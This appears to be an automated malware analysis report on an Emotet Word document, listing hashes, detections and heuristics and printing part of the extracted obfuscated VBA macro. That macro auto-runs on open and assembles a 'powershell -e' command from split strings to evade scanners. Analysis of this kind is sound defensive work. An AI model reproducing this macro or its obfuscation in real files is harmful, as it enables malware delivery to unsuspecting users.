Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 7d3089cb9930a9d0…

MALICIOUS

Office (OLE)

205.1 KB Created: 2019-03-13 06:48:00 Authoring application: Microsoft Office Word First seen: 2021-09-25
MD5: bc69975d3727bffbc0f6e59488f70b05 SHA-1: 5b4837e75bc73cf9335c562945f40a8f5ba464c1 SHA-256: 7d3089cb9930a9d0c0fdb7d4e5909ee4a9b470476cc9b99e57bb1eefba7cf7b7
262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6892858-0', strongly suggesting the Emotet family. Critical heuristics indicate obfuscated API calls, specifically reassembling 'Win32_Process', and an auto-executing VBA macro ('autoopen') that uses GetObject. This points to the macro's intent to download and execute a second-stage payload, a common Emotet behavior.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6892858-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6892858-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39354 bytes
SHA-256: 688a31684aa41303b779ff84138a0daf40708c1fa877cab74a5227252e8ada5c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "TDZZAZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function XDoDxAAA()
   If kDABAAAB = jBAQZUUA Then
rAA1oAA1 = Chr(FDoB4AA)
Ok4UAAAA = H_Ax4ABA + ChrW(zQCABUQG) * 896450452 * CBool(945236921) + 771206311 / Round(zBowABAD) - RoA_A1G + Sqr(28125362) - 298852323 * CByte(204779173)
nAAoD4kD = Chr(uAAAUA)
End If
   If MC1wXwXA = UUA_ABA Then
sB4ZxAk = Chr(wACoCoA)
nBQGBo1 = UAXAAcU + ChrW(h_1BDAUB) * 528549579 * CBool(409327642) + 523721396 / Round(VGAZ44XA) - SwUAAQ + Sqr(530684608) - 976660593 * CByte(475811634)
UkwAQxCA = Chr(GCAUQDQU)
End If
   If OAxAAADA = iC_DDA Then
rAAGBk = Chr(QAA1AU)
XAAXG4A1 = fBQQ11 + ChrW(iZB4Zo) * 243619015 * CBool(35135114) + 433408346 / Round(JxCBQAXA) - LUoAAZk + Sqr(236703082) - 540283193 * CByte(758062734)
ExoABA = Chr(jXoB4XAc)
End If
   If ZC4_4A = nAUcww Then
zAXc_Ak = Chr(q4w1oAA)
BC_DZCG = LBABQcDo + ChrW(TBAABAAX) * 235363685 * CBool(761473209) + 870152621 / Round(FAXBAB) - QD_AXC + Sqr(952686863) - 832674850 * CByte(248485397)
PZZACA = Chr(lQAADU)
End If
   If jAUAAUD = p_AAA_A4 Then
HBZxAwA = Chr(HACDAG)
JXXQwABx = j1ADA_UA + ChrW(kAUAZA) * 362306479 * CBool(81105462) + 853252963 / Round(iBUAADB) - hxCwB4UQ + Sqr(275339162) - 483380093 * CByte(376794654)
GxQZxADU = Chr(VAx_Dw)
End If
   If rUBABAA = lcZGAA Then
vAwZcAAA = Chr(VoABA1)
sZGwDA = MAo4G4 + ChrW(RAAxBQAx) * 493001719 * CBool(827962784) + 337505268 / Round(tAwZA1) - kB44CG + Sqr(230390277) - 276417685 * CByte(734242857)
qkZBwkUD = Chr(lQ1AADZ)
End If
   If jUXDAAGw = sAAkkA Then
jZAwGB = Chr(bxAQGk)
vCAUBAwA = hA1ABDA + ChrW(aA_x4o) * 982795144 * CBool(715766393) + 631012098 / Round(ZUZDXXA) - Y1BBkAD + Sqr(764486410) - 720233305 * CByte(186433001)
JBAUAAQQ = Chr(ioxAAGw)
End If
End Function
Sub autoopen()
On Error Resume Next
   If mAc4QAG = CUcxwAA Then
Y_AU4cA = Chr(nADkADA)
kCAQ1AG = iABo_ABA + ChrW(B1ccABAB) * 465208336 * CBool(906153006) + 53399885 / Round(qAXDAA) - BAccAZoA + Sqr(916460620) - 552680124 * CByte(303970374)
SXAC4cUA = Chr(zABxA1DA)
End If
   If cZXQCDA = MU_BDGD Then
KAADxkUB = Chr(zADoBAD)
JABQDB = EAwQ_4DA + ChrW(J_DkD_Q) * 609826907 * CBool(213672493) + 889857253 / Round(VxAADCDX) - fAAZUA_ + Sqr(726031573) - 277655109 * CByte(156349624)
uQDAUD = Chr(hZAXAXDQ)
End If
z4A4A4 (TUUoAAB + "po" + HZ4GoDAG + "wersh" + LxwCBD + "ell -e " + KUCZkQA + JwAAX4Ao + CUUoCDA + oBAXGXUD + VXDAxBAB + i1Zc4U + RAZoAAGo)
   If dUACUA = O_AQ4AD Then
SAAQQoAQ = Chr(JBAA1DXB)
KGxAAkX = Z1GXCAoQ + ChrW(ZXUGcQQC) * 636579409 * CBool(501082295) + 421499176 / Round(YxUUw_) - l_BB_ZGD + Sqr(559236429) - 417494175 * CByte(571151515)
UUQxAA1A = Chr(cDXXXABA)
End If
   If f4cA4wC = DAAAA_o Then
h_cAUAAX = Chr(vQkA1X)
lk1AAD = SDAAGUD + ChrW(nZGoAZAB) * 741291263 * CBool(450037228) + 682880838 / Round(ACBAAB) - BAAAUCA + Sqr(117004240) - 546936833 * CByte(217677744)
aQUDAA = Chr(XGAA_DDX)
End If
   If zXADBUA = scZ1oQUZ Then
GUUAAAAB = Chr(RZUACD)
Q_UBcAA = V4BAAU + ChrW(pAAAxABD) * 279105647 * CBool(335301514) + 348879669 / Round(TQAoXc1) - oxDAAwD_ + Sqr(288360160) - 93303815 * CByte(472558799)
FAU1AA = Chr(iUQUADQo)
End If
End Sub
Function bDZADcGA()
   If AXA41C = RABQcBAA Then
mo__wAk = Chr(vABBcU1X)
bGC4o_wU = IAGAU4D + ChrW(wX_Xk1_) * 482984357 * CBool(616196272) + 599158772 / Round(TAACGQ1B) - Ck4ABGQA + Sqr(383196652) - 311111038 * CByte(532502944)
mA_B1Ac4 = Chr(nQACDUAQ)
End If
   If iADQADD = h1AQAU Then
fAQcAAw = Chr(wQGAAAAG)
jDU_QwkC = dDB1AwAZ + ChrW(NBQoA1) * 140008664 * CBool(117776798) + 903836519 / Round(r4GBAAU) - IGZ_XBwD + Sqr(749168483) - 492330873 * CByte(104531674)
tAAQAA = Chr(zAAAAQ)
End If
   If zCCBwx = bA1UXx Then
LC_ADQ = Chr(iUQU4AoA)
lCQAoXU = TUAoAA + ChrW(PAkUACAA) * 856484161 * CBool(238739587) + 61481460 / Round(SDBQAAAB) - Mw_4AQ + Sqr(484600863) - 741642980 * CByte(430500828)
ikAU1xAZ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.